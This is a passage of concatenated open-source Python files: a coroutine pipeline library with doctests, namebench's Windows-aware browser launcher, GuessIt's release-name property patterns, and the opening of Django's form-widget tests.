>>> # ct.send("Meh")
>>> # ct.close()
"""
while True:
try:
item = yield
for target in targets:
target.send(item)
except StandardError, e:
for target in targets:
target.throw(e.__class__, e.message)
class CoTee(object):
"""
>>> ct = CoTee()
>>> ct.register_sink(printer_sink("1 %s"))
>>> ct.register_sink(printer_sink("2 %s"))
>>> ct.stage.send("Hello")
1 Hello
2 Hello
>>> ct.stage.send("World")
1 World
2 World
>>> ct.register_sink(printer_sink("3 %s"))
>>> ct.stage.send("Foo")
1 Foo
2 Foo
3 Foo
>>> # ct.stage.throw(RuntimeError, "Goodbye")
>>> # ct.stage.send("Meh")
>>> # ct.stage.close()
"""
def __init__(self):
self.stage = self._stage()
self._targets = []
def register_sink(self, sink):
self._targets.append(sink)
def unregister_sink(self, sink):
self._targets.remove(sink)
def restart(self):
self.stage = self._stage()
@autostart
def _stage(self):
while True:
try:
item = yield
for target in self._targets:
target.send(item)
except StandardError, e:
for target in self._targets:
target.throw(e.__class__, e.message)
def _flush_queue(queue):
while not queue.empty():
yield queue.get()
@autostart
def cocount(target, start = 0):
"""
>>> cc = cocount(printer_sink("%s"))
>>> cc.send("a")
0
>>> cc.send(None)
1
>>> cc.send([])
2
>>> cc.send(0)
3
"""
for i in itertools.count(start):
item = yield
target.send(i)
@autostart
def coenumerate(target, start = 0):
"""
>>> ce = coenumerate(printer_sink("%r"))
>>> ce.send("a")
(0, 'a')
>>> ce.send(None)
(1, None)
>>> ce.send([])
(2, [])
>>> ce.send(0)
(3, 0)
"""
for i in itertools.count(start):
item = yield
decoratedItem = i, item
target.send(decoratedItem)
@autostart
def corepeat(target, elem):
"""
>>> cr = corepeat(printer_sink("%s"), "Hello World")
>>> cr.send("a")
Hello World
>>> cr.send(None)
Hello World
>>> cr.send([])
Hello World
>>> cr.send(0)
Hello World
"""
while True:
item = yield
target.send(elem)
@autostart
def cointercept(target, elems):
"""
>>> cr = cointercept(printer_sink("%s"), [1, 2, 3, 4])
>>> cr.send("a")
1
>>> cr.send(None)
2
>>> cr.send([])
3
>>> cr.send(0)
4
>>> cr.send("Bye")
Traceback (most recent call last):
File "/usr/lib/python2.5/doctest.py", line 1228, in __run
compileflags, 1) in test.globs
File "<doctest __main__.cointercept[5]>", line 1, in <module>
cr.send("Bye")
StopIteration
"""
item = yield
for elem in elems:
target.send(elem)
item = yield
@autostart
def codropwhile(target, pred):
"""
>>> cdw = codropwhile(printer_sink("%s"), lambda x: x)
>>> cdw.send([0, 1, 2])
>>> cdw.send(1)
>>> cdw.send(True)
>>> cdw.send(False)
>>> cdw.send([0, 1, 2])
[0, 1, 2]
>>> cdw.send(1)
1
>>> cdw.send(True)
True
"""
while True:
item = yield
if not pred(item):
break
while True:
item = yield
target.send(item)
@autostart
def cotakewhile(target, pred):
"""
>>> ctw = cotakewhile(printer_sink("%s"), lambda x: x)
>>> ctw.send([0, 1, 2])
[0, 1, 2]
>>> ctw.send(1)
1
>>> ctw.send(True)
True
>>> ctw.send(False)
>>> ctw.send([0, 1, 2])
>>> ctw.send(1)
>>> ctw.send(True)
"""
while True:
item = yield
if not pred(item):
break
target.send(item)
while True:
item = yield
@autostart
def coslice(target, lower, upper):
"""
>>> cs = coslice(printer_sink("%r"), 3, 5)
>>> cs.send("0")
>>> cs.send("1")
>>> cs.send("2")
>>> cs.send("3")
'3'
>>> cs.send("4")
'4'
>>> cs.send("5")
>>> cs.send("6")
"""
for i in xrange(lower):
item = yield
for i in xrange(upper - lower):
item = yield
target.send(item)
while True:
item = yield
@autostart
def cochain(targets):
"""
>>> cr = cointercept(printer_sink("good %s"), [1, 2, 3, 4])
>>> cc = cochain([cr, printer_sink("end %s")])
>>> cc.send("a")
good 1
>>> cc.send(None)
good 2
>>> cc.send([])
good 3
>>> cc.send(0)
good 4
>>> cc.send("Bye")
end Bye
"""
behind = []
for target in targets:
try:
while behind:
item = behind.pop()
target.send(item)
while True:
item = yield
target.send(item)
except StopIteration:
behind.append(item)
@autostart
def queue_sink(queue):
"""
>>> q = Queue.Queue()
>>> qs = queue_sink(q)
>>> qs.send("Hello")
>>> qs.send("World")
>>> qs.throw(RuntimeError, "Goodbye")
>>> qs.send("Meh")
>>> qs.close()
>>> print [i for i in _flush_queue(q)]
[(None, 'Hello'), (None, 'World'), (<type 'exceptions.RuntimeError'>, 'Goodbye'), (None, 'Meh'), (<type 'exceptions.GeneratorExit'>, None)]
"""
while True:
try:
item = yield
queue.put((None, item))
except StandardError, e:
queue.put((e.__class__, e.message))
except GeneratorExit:
queue.put((GeneratorExit, None))
raise
def decode_item(item, target):
if item[0] is None:
target.send(item[1])
return False
elif item[0] is GeneratorExit:
target.close()
return True
else:
target.throw(item[0], item[1])
return False
def queue_source(queue, target):
"""
>>> q = Queue.Queue()
>>> for i in [
... (None, 'Hello'),
... (None, 'World'),
... (GeneratorExit, None),
... ]:
... q.put(i)
>>> qs = queue_source(q, printer_sink())
Hello
World
"""
isDone = False
while not isDone:
item = queue.get()
isDone = decode_item(item, target)
def threaded_stage(target, thread_factory = threading.Thread):
messages = Queue.Queue()
run_source = functools.partial(queue_source, messages, target)
thread_factory(target=run_source).start()
# Sink running in current thread
return functools.partial(queue_sink, messages)
@autostart
def pickle_sink(f):
while True:
try:
item = yield
pickle.dump((None, item), f)
except StandardError, e:
pickle.dump((e.__class__, e.message), f)
except GeneratorExit:
pickle.dump((GeneratorExit, ), f)
raise
except StopIteration:
f.close()
return
def pickle_source(f, target):
try:
isDone = False
while not isDone:
item = pickle.load(f)
isDone = decode_item(item, target)
except EOFError:
target.close()
class EventHandler(object, xml.sax.ContentHandler):
START = "start"
TEXT = "text"
END = "end"
def __init__(self, target):
object.__init__(self)
xml.sax.ContentHandler.__init__(self)
self._target = target
def startElement(self, name, attrs):
self._target.send((self.START, (name, attrs._attrs)))
def characters(self, text):
self._target.send((self.TEXT, text))
def endElement(self, name):
self._target.send((self.END, name))
def expat_parse(f, target):
parser = xml.parsers.expat.ParserCreate()
parser.buffer_size = 65536
parser.buffer_text = True
parser.returns_unicode = False
parser.StartElementHandler = lambda name, attrs: target.send(('start', (name, attrs)))
parser.EndElementHandler = lambda name: target.send(('end', name))
parser.CharacterDataHandler = lambda data: target.send(('text', data))
parser.ParseFile(f)
if __name__ == "__main__":
import doctest
doctest.testmod()
| lgpl-2.1 |
perrytm/namebench | libnamebench/better_webbrowser.py | 175 | 4191 | #!/usr/bin/env python
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrapper for webbrowser library, to invoke the http handler on win32."""
__author__ = 'tstromberg@google.com (Thomas Stromberg)'
import os.path
import subprocess
import sys
import traceback
import webbrowser
import util
def output(string):
print string
def create_win32_http_cmd(url):
"""Create a command-line tuple to launch a web browser for a given URL.
Args:
url: string
Returns:
tuple of: (executable, arg1, arg2, ...)
At the moment, this ignores all default arguments to the browser.
TODO(tstromberg): Properly parse the command-line arguments.
"""
browser_type = None
try:
key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,
'Software\Classes\http\shell\open\command')
browser_type = 'user'
except WindowsError:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,
'Software\Classes\http\shell\open\command')
browser_type = 'machine'
except:
return False
cmd = _winreg.EnumValue(key, 0)[1]
# "C:\blah blah\iexplore.exe" -nohome
# "C:\blah blah\firefox.exe" -requestPending -osint -url "%1"
if '"' in cmd:
executable = cmd.split('"')[1]
else:
executable = cmd.split(' ')[0]
if not os.path.exists(executable):
output('$ Default HTTP browser does not exist: %s' % executable)
return False
else:
output('$ %s HTTP handler: %s' % (browser_type, executable))
return (executable, url)
def open(url):
"""Opens a URL, overriding the normal webbrowser.open methods for sanity."""
try:
webbrowser.open(url, new=1, autoraise=True)
# If the user is missing the osascript binary - see
# http://code.google.com/p/namebench/issues/detail?id=88
except:
output('Failed to open: [%s]: %s' % (url, util.GetLastExceptionString()))
if os.path.exists('/usr/bin/open'):
try:
output('trying open: %s' % url)
p = subprocess.Popen(('open', url))
p.wait()
except:
output('open did not seem to work: %s' % util.GetLastExceptionString())
elif sys.platform[:3] == 'win':
try:
output('trying default Windows controller: %s' % url)
controller = webbrowser.get('windows-default')
controller.open_new(url)
except:
output('WindowsController did not work: %s' % util.GetLastExceptionString())
# *NOTE*: EVIL IMPORT SIDE EFFECTS AHEAD!
#
# If we are running on Windows, register the WindowsHttpDefault class.
if sys.platform[:3] == 'win':
import _winreg
# We don't want to load this class by default, because Python 2.4 doesn't have BaseBrowser.
class WindowsHttpDefault(webbrowser.BaseBrowser):
"""Provide an alternate open class for Windows user, using the http handler."""
def open(self, url, new=0, autoraise=1):
command_args = create_win32_http_cmd(url)
if not command_args:
output('$ Could not find HTTP handler')
return False
output('command_args:')
output(command_args)
# Avoid some unicode path issues by moving our current directory
old_pwd = os.getcwd()
os.chdir('C:\\')
try:
_unused = subprocess.Popen(command_args)
os.chdir(old_pwd)
return True
except:
traceback.print_exc()
output('$ Failed to run HTTP handler, trying next browser.')
os.chdir(old_pwd)
return False
webbrowser.register('windows-http', WindowsHttpDefault, update_tryorder=-1)
| apache-2.0 |
Elandril/SickRage | lib/guessit/transfo/guess_properties.py | 28 | 16821 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2013 Rémi Alvergnat <toilal.dev@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function, unicode_literals
import re
from guessit.containers import PropertiesContainer, WeakValidator, LeavesValidator, QualitiesContainer, ChainedValidator, DefaultValidator, OnlyOneValidator, LeftValidator, NeighborValidator, FullMatchValidator
from guessit.patterns import sep, build_or_pattern
from guessit.patterns.extension import subtitle_exts, video_exts, info_exts
from guessit.patterns.numeral import numeral, parse_numeral
from guessit.plugins.transformers import Transformer
from guessit.matcher import GuessFinder, found_property
class GuessProperties(Transformer):
def __init__(self):
Transformer.__init__(self, 35)
self.container = PropertiesContainer()
self.qualities = QualitiesContainer()
def register_property(propname, props, **kwargs):
"""props a dict of {value: [patterns]}"""
for canonical_form, patterns in props.items():
if isinstance(patterns, tuple):
patterns2, pattern_kwarg = patterns
if kwargs:
current_kwarg = dict(kwargs)
current_kwarg.update(pattern_kwarg)
else:
current_kwarg = dict(pattern_kwarg)
current_kwarg['canonical_form'] = canonical_form
self.container.register_property(propname, *patterns2, **current_kwarg)
elif kwargs:
current_kwarg = dict(kwargs)
current_kwarg['canonical_form'] = canonical_form
self.container.register_property(propname, *patterns, **current_kwarg)
else:
self.container.register_property(propname, *patterns, canonical_form=canonical_form)
def register_quality(propname, quality_dict):
"""props a dict of {canonical_form: quality}"""
for canonical_form, quality in quality_dict.items():
self.qualities.register_quality(propname, canonical_form, quality)
# http://en.wikipedia.org/wiki/Pirated_movie_release_types
register_property('format', {'VHS': ['VHS', 'VHS-Rip'],
'Cam': ['CAM', 'CAMRip', 'HD-CAM'],
#'Telesync': ['TELESYNC', 'PDVD'],
'Telesync': (['TS', 'HD-TS'], {'confidence': 0.4}),
'Workprint': ['WORKPRINT', 'WP'],
'Telecine': ['TELECINE', 'TC'],
'PPV': ['PPV', 'PPV-Rip'], # Pay Per View
'TV': ['SD-TV', 'SD-TV-Rip', 'Rip-SD-TV', 'TV-Rip', 'Rip-TV'],
'DVB': ['DVB-Rip', 'DVB', 'PD-TV'],
'DVD': ['DVD', 'DVD-Rip', 'VIDEO-TS', 'DVD-R', 'DVD-9', 'DVD-5'],
'HDTV': ['HD-TV', 'TV-RIP-HD', 'HD-TV-RIP', 'HD-RIP'],
'VOD': ['VOD', 'VOD-Rip'],
'WEBRip': ['WEB-Rip'],
'WEB-DL': ['WEB-DL', 'WEB-HD', 'WEB'],
'HD-DVD': ['HD-DVD-Rip', 'HD-DVD'],
'BluRay': ['Blu-ray(?:-Rip)?', 'B[DR]', 'B[DR]-Rip', 'BD[59]', 'BD25', 'BD50']
})
register_quality('format', {'VHS': -100,
'Cam': -90,
'Telesync': -80,
'Workprint': -70,
'Telecine': -60,
'PPV': -50,
'TV': -30,
'DVB': -20,
'DVD': 0,
'HDTV': 20,
'VOD': 40,
'WEBRip': 50,
'WEB-DL': 60,
'HD-DVD': 80,
'BluRay': 100
})
register_property('screenSize', {'360p': ['(?:\d{3,}(?:\\|\/|x|\*))?360(?:i|p?x?)'],
'368p': ['(?:\d{3,}(?:\\|\/|x|\*))?368(?:i|p?x?)'],
'480p': ['(?:\d{3,}(?:\\|\/|x|\*))?480(?:i|p?x?)'],
#'480p': (['hr'], {'confidence': 0.2}), # duplicate dict key
'576p': ['(?:\d{3,}(?:\\|\/|x|\*))?576(?:i|p?x?)'],
'720p': ['(?:\d{3,}(?:\\|\/|x|\*))?720(?:i|p?x?)'],
'900p': ['(?:\d{3,}(?:\\|\/|x|\*))?900(?:i|p?x?)'],
'1080i': ['(?:\d{3,}(?:\\|\/|x|\*))?1080i'],
'1080p': ['(?:\d{3,}(?:\\|\/|x|\*))?1080p?x?'],
'4K': ['(?:\d{3,}(?:\\|\/|x|\*))?2160(?:i|p?x?)']
},
validator=ChainedValidator(DefaultValidator(), OnlyOneValidator()))
_digits_re = re.compile('\d+')
def resolution_formatter(value):
digits = _digits_re.findall(value)
return 'x'.join(digits)
self.container.register_property('screenSize', '\d{3,4}-?[x\*]-?\d{3,4}', canonical_from_pattern=False, formatter=resolution_formatter)
register_quality('screenSize', {'360p': -300,
'368p': -200,
'480p': -100,
'576p': 0,
'720p': 100,
'900p': 130,
'1080i': 180,
'1080p': 200,
'4K': 400
})
_videoCodecProperty = {'Real': ['Rv\d{2}'], # http://en.wikipedia.org/wiki/RealVideo
'Mpeg2': ['Mpeg2'],
'DivX': ['DVDivX', 'DivX'],
'XviD': ['XviD'],
'h264': ['[hx]-264(?:-AVC)?', 'MPEG-4(?:-AVC)'],
'h265': ['[hx]-265(?:-HEVC)?', 'HEVC']
}
register_property('videoCodec', _videoCodecProperty)
register_quality('videoCodec', {'Real': -50,
'Mpeg2': -30,
'DivX': -10,
'XviD': 0,
'h264': 100,
'h265': 150
})
# http://blog.mediacoderhq.com/h264-profiles-and-levels/
# http://fr.wikipedia.org/wiki/H.264
self.container.register_property('videoProfile', 'BP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', 'XP', 'EP', canonical_form='XP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', 'MP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', 'HP', 'HiP', canonical_form='HP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', '10.?bit', 'Hi10P', canonical_form='10bit')
self.container.register_property('videoProfile', '8.?bit', canonical_form='8bit')
self.container.register_property('videoProfile', 'Hi422P', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
self.container.register_property('videoProfile', 'Hi444PP', validator=LeavesValidator(lambdas=[lambda node: 'videoCodec' in node.guess]))
register_quality('videoProfile', {'BP': -20,
'XP': -10,
'MP': 0,
'HP': 10,
'10bit': 15,
'Hi422P': 25,
'Hi444PP': 35
})
# has nothing to do here (or on filenames for that matter), but some
# releases use it and it helps to identify release groups, so we adapt
register_property('videoApi', {'DXVA': ['DXVA']})
register_property('audioCodec', {'MP3': ['MP3', 'LAME', 'LAME(?:\d)+-(?:\d)+'],
'DolbyDigital': ['DD'],
'AAC': ['AAC'],
'AC3': ['AC3'],
'Flac': ['FLAC'],
'DTS': (['DTS'], {'validator': LeftValidator()}),
'TrueHD': ['True-HD']
})
register_quality('audioCodec', {'MP3': 10,
'DolbyDigital': 30,
'AAC': 35,
'AC3': 40,
'Flac': 45,
'DTS': 60,
'TrueHD': 70
})
self.container.register_property('audioProfile', 'HD', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'DTS']))
self.container.register_property('audioProfile', 'HD-MA', canonical_form='HDMA', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'DTS']))
self.container.register_property('audioProfile', 'HE', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'AAC']))
self.container.register_property('audioProfile', 'LC', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'AAC']))
self.container.register_property('audioProfile', 'HQ', validator=LeavesValidator(lambdas=[lambda node: node.guess.get('audioCodec') == 'AC3']))
register_quality('audioProfile', {'HD': 20,
'HDMA': 50,
'LC': 0,
'HQ': 0,
'HE': 20
})
register_property('audioChannels', {'7.1': ['7[\W_]1', '7ch', '8ch'],
'5.1': ['5[\W_]1', '5ch', '6ch'],
'2.0': ['2[\W_]0', '2ch', 'stereo'],
'1.0': ['1[\W_]0', '1ch', 'mono']
})
register_quality('audioChannels', {'7.1': 200,
'5.1': 100,
'2.0': 0,
'1.0': -100
})
self.container.register_property('episodeFormat', r'Minisodes?', canonical_form='Minisode')
self.container.register_property('crc32', '(?:[a-fA-F]|[0-9]){8}', enhance=False, canonical_from_pattern=False)
part_words = ['pt', 'part']
self.container.register_property(None, '(' + build_or_pattern(part_words) + sep + '?(?P<part>' + numeral + '))[^0-9]', enhance=False, canonical_from_pattern=False, confidence=0.4, formatter=parse_numeral)
register_property('other', {'AudioFix': ['Audio-Fix', 'Audio-Fixed'],
'SyncFix': ['Sync-Fix', 'Sync-Fixed'],
'DualAudio': ['Dual-Audio'],
'WideScreen': ['ws', 'wide-screen'],
'Netflix': ['Netflix', 'NF']
})
self.container.register_property('other', 'Real', 'Fix', canonical_form='Proper', validator=ChainedValidator(FullMatchValidator(), NeighborValidator()))
self.container.register_property('other', 'Proper', 'Repack', 'Rerip', canonical_form='Proper')
self.container.register_property('other', 'Fansub', canonical_form='Fansub', validator=ChainedValidator(FullMatchValidator(), NeighborValidator()))
self.container.register_property('other', 'Fastsub', canonical_form='Fastsub', validator=ChainedValidator(FullMatchValidator(), NeighborValidator()))
self.container.register_property('other', '(?:Seasons?' + sep + '?)?Complete', canonical_form='Complete')
self.container.register_property('other', 'R5', 'RC', canonical_form='R5')
self.container.register_property('other', 'Pre-Air', 'Preair', canonical_form='Preair')
self.container.register_property('other', 'CC') # Close Caption
self.container.register_property('other', 'LD', 'MD') # Line/Mic Dubbed
self.container.register_canonical_properties('other', 'Screener', 'Remux', '3D', 'HD', 'mHD', 'HDLight', 'HQ',
'DDC',
'HR', 'PAL', 'SECAM', 'NTSC')
self.container.register_canonical_properties('other', 'Limited', 'Complete', 'Classic', 'Unrated', 'LiNE', 'Bonus', 'Trailer', validator=WeakValidator())
for prop in self.container.get_properties('format'):
self.container.register_property('other', prop.pattern + '(-?Scr(?:eener)?)', canonical_form='Screener')
for exts in (subtitle_exts, info_exts, video_exts):
for container in exts:
self.container.register_property('container', container, confidence=0.3)
def guess_properties(self, string, node=None, options=None):
found = self.container.find_properties(string, node, options)
guess = self.container.as_guess(found, string)
if guess and node:
if 'part' in guess:
# If two guesses contains both part in same group, create an partList
for existing_guess in node.group_node().guesses:
if 'part' in existing_guess:
if 'partList' not in existing_guess:
existing_guess['partList'] = [existing_guess['part']]
existing_guess['partList'].append(guess['part'])
existing_guess['partList'].sort()
if existing_guess['part'] > guess['part']:
existing_guess.set_confidence('part', 0)
else:
guess.set_confidence('part', 0)
guess['partList'] = list(existing_guess['partList'])
return guess
def supported_properties(self):
supported_properties = list(self.container.get_supported_properties())
supported_properties.append('partList')
return supported_properties
def process(self, mtree, options=None):
GuessFinder(self.guess_properties, 1.0, self.log, options).process_nodes(mtree.unidentified_leaves())
proper_count = 0
for other_leaf in mtree.leaves_containing('other'):
if 'other' in other_leaf.info and 'Proper' in other_leaf.info['other']:
proper_count += 1
if proper_count:
found_property(mtree, 'properCount', proper_count)
def rate_quality(self, guess, *props):
return self.qualities.rate_quality(guess, *props)
| gpl-3.0 |
oinopion/django | tests/forms_tests/tests/test_widgets.py | 29 | 105047 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import copy
import datetime
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from django.forms import (
BooleanField, CharField, CheckboxInput, CheckboxSelectMultiple,
ChoiceField, ClearableFileInput, DateField, DateInput, DateTimeInput,
FileInput, Form, HiddenInput, MultipleChoiceField, MultipleHiddenInput,
MultiValueField, MultiWidget, NullBooleanSelect, PasswordInput,
RadioSelect, Select, SelectDateWidget, SelectMultiple, SplitDateTimeField,
SplitDateTimeWidget, Textarea, TextInput, TimeInput, ValidationError,
)
from django.forms.widgets import (
ChoiceFieldRenderer, ChoiceInput, RadioFieldRenderer,
)
from django.test import SimpleTestCase, override_settings
from django.utils import six, translation
from django.utils.dates import MONTHS_AP
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.safestring import SafeData, mark_safe
from ..models import Article
class FormsWidgetTests(SimpleTestCase):
# Each Widget class corresponds to an HTML form widget. A Widget knows how to
# render itself, given a field name and some data. Widgets don't perform
# validation.
def test_textinput(self):
w = TextInput()
self.assertHTMLEqual(w.render('email', ''), '<input type="text" name="email" />')
self.assertHTMLEqual(w.render('email', None), '<input type="text" name="email" />')
self.assertHTMLEqual(w.render('email', 'test@example.com'), '<input type="text" name="email" value="test@example.com" />')
self.assertHTMLEqual(w.render('email', 'some "quoted" & ampersanded value'), '<input type="text" name="email" value="some "quoted" & ampersanded value" />')
self.assertHTMLEqual(w.render('email', 'test@example.com', attrs={'class': 'fun'}), '<input type="text" name="email" value="test@example.com" class="fun" />')
self.assertHTMLEqual(w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<input type="text" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" class="fun" />')
# You can also pass 'attrs' to the constructor:
w = TextInput(attrs={'class': 'fun', 'type': 'email'})
self.assertHTMLEqual(w.render('email', ''), '<input type="email" class="fun" name="email" />')
self.assertHTMLEqual(w.render('email', 'foo@example.com'), '<input type="email" class="fun" value="foo@example.com" name="email" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = TextInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('email', '', attrs={'class': 'special'}), '<input type="text" class="special" name="email" />')
# 'attrs' can be safe-strings if needed)
w = TextInput(attrs={'onBlur': mark_safe("function('foo')")})
self.assertHTMLEqual(w.render('email', ''), '<input onBlur="function(\'foo\')" type="text" name="email" />')
def test_passwordinput(self):
w = PasswordInput()
self.assertHTMLEqual(w.render('email', ''), '<input type="password" name="email" />')
self.assertHTMLEqual(w.render('email', None), '<input type="password" name="email" />')
self.assertHTMLEqual(w.render('email', 'secret'), '<input type="password" name="email" />')
# The render_value argument lets you specify whether the widget should render
# its value. For security reasons, this is off by default.
w = PasswordInput(render_value=True)
self.assertHTMLEqual(w.render('email', ''), '<input type="password" name="email" />')
self.assertHTMLEqual(w.render('email', None), '<input type="password" name="email" />')
self.assertHTMLEqual(w.render('email', 'test@example.com'), '<input type="password" name="email" value="test@example.com" />')
self.assertHTMLEqual(w.render('email', 'some "quoted" & ampersanded value'), '<input type="password" name="email" value="some "quoted" & ampersanded value" />')
self.assertHTMLEqual(w.render('email', 'test@example.com', attrs={'class': 'fun'}), '<input type="password" name="email" value="test@example.com" class="fun" />')
# You can also pass 'attrs' to the constructor:
w = PasswordInput(attrs={'class': 'fun'}, render_value=True)
self.assertHTMLEqual(w.render('email', ''), '<input type="password" class="fun" name="email" />')
self.assertHTMLEqual(w.render('email', 'foo@example.com'), '<input type="password" class="fun" value="foo@example.com" name="email" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = PasswordInput(attrs={'class': 'pretty'}, render_value=True)
self.assertHTMLEqual(w.render('email', '', attrs={'class': 'special'}), '<input type="password" class="special" name="email" />')
self.assertHTMLEqual(w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<input type="password" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />')
def test_hiddeninput(self):
w = HiddenInput()
self.assertHTMLEqual(w.render('email', ''), '<input type="hidden" name="email" />')
self.assertHTMLEqual(w.render('email', None), '<input type="hidden" name="email" />')
self.assertHTMLEqual(w.render('email', 'test@example.com'), '<input type="hidden" name="email" value="test@example.com" />')
self.assertHTMLEqual(w.render('email', 'some "quoted" & ampersanded value'), '<input type="hidden" name="email" value="some "quoted" & ampersanded value" />')
self.assertHTMLEqual(w.render('email', 'test@example.com', attrs={'class': 'fun'}), '<input type="hidden" name="email" value="test@example.com" class="fun" />')
# You can also pass 'attrs' to the constructor:
w = HiddenInput(attrs={'class': 'fun'})
self.assertHTMLEqual(w.render('email', ''), '<input type="hidden" class="fun" name="email" />')
self.assertHTMLEqual(w.render('email', 'foo@example.com'), '<input type="hidden" class="fun" value="foo@example.com" name="email" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = HiddenInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('email', '', attrs={'class': 'special'}), '<input type="hidden" class="special" name="email" />')
self.assertHTMLEqual(w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = HiddenInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('email', '', attrs={'class': 'special'}), '<input type="hidden" class="special" name="email" />')
# Boolean values are rendered to their string forms ("True" and "False").
w = HiddenInput()
self.assertHTMLEqual(w.render('get_spam', False), '<input type="hidden" name="get_spam" value="False" />')
self.assertHTMLEqual(w.render('get_spam', True), '<input type="hidden" name="get_spam" value="True" />')
def test_multiplehiddeninput(self):
w = MultipleHiddenInput()
self.assertHTMLEqual(w.render('email', []), '')
self.assertHTMLEqual(w.render('email', None), '')
self.assertHTMLEqual(w.render('email', ['test@example.com']), '<input type="hidden" name="email" value="test@example.com" />')
self.assertHTMLEqual(w.render('email', ['some "quoted" & ampersanded value']), '<input type="hidden" name="email" value="some "quoted" & ampersanded value" />')
self.assertHTMLEqual(w.render('email', ['test@example.com', 'foo@example.com']), '<input type="hidden" name="email" value="test@example.com" />\n<input type="hidden" name="email" value="foo@example.com" />')
self.assertHTMLEqual(w.render('email', ['test@example.com'], attrs={'class': 'fun'}), '<input type="hidden" name="email" value="test@example.com" class="fun" />')
self.assertHTMLEqual(w.render('email', ['test@example.com', 'foo@example.com'], attrs={'class': 'fun'}), '<input type="hidden" name="email" value="test@example.com" class="fun" />\n<input type="hidden" name="email" value="foo@example.com" class="fun" />')
# You can also pass 'attrs' to the constructor:
w = MultipleHiddenInput(attrs={'class': 'fun'})
self.assertHTMLEqual(w.render('email', []), '')
self.assertHTMLEqual(w.render('email', ['foo@example.com']), '<input type="hidden" class="fun" value="foo@example.com" name="email" />')
self.assertHTMLEqual(w.render('email', ['foo@example.com', 'test@example.com']), '<input type="hidden" class="fun" value="foo@example.com" name="email" />\n<input type="hidden" class="fun" value="test@example.com" name="email" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = MultipleHiddenInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('email', ['foo@example.com'], attrs={'class': 'special'}), '<input type="hidden" class="special" value="foo@example.com" name="email" />')
self.assertHTMLEqual(w.render('email', ['ŠĐĆŽćžšđ'], attrs={'class': 'fun'}), '<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = MultipleHiddenInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('email', ['foo@example.com'], attrs={'class': 'special'}), '<input type="hidden" class="special" value="foo@example.com" name="email" />')
# Each input gets a separate ID.
w = MultipleHiddenInput()
self.assertHTMLEqual(w.render('letters', list('abc'), attrs={'id': 'hideme'}), '<input type="hidden" name="letters" value="a" id="hideme_0" />\n<input type="hidden" name="letters" value="b" id="hideme_1" />\n<input type="hidden" name="letters" value="c" id="hideme_2" />')
def test_fileinput(self):
# FileInput widgets don't ever show the value, because the old value is of no use
# if you are updating the form or if the provided file generated an error.
w = FileInput()
self.assertHTMLEqual(w.render('email', ''), '<input type="file" name="email" />')
self.assertHTMLEqual(w.render('email', None), '<input type="file" name="email" />')
self.assertHTMLEqual(w.render('email', 'test@example.com'), '<input type="file" name="email" />')
self.assertHTMLEqual(w.render('email', 'some "quoted" & ampersanded value'), '<input type="file" name="email" />')
self.assertHTMLEqual(w.render('email', 'test@example.com', attrs={'class': 'fun'}), '<input type="file" name="email" class="fun" />')
# You can also pass 'attrs' to the constructor:
w = FileInput(attrs={'class': 'fun'})
self.assertHTMLEqual(w.render('email', ''), '<input type="file" class="fun" name="email" />')
self.assertHTMLEqual(w.render('email', 'foo@example.com'), '<input type="file" class="fun" name="email" />')
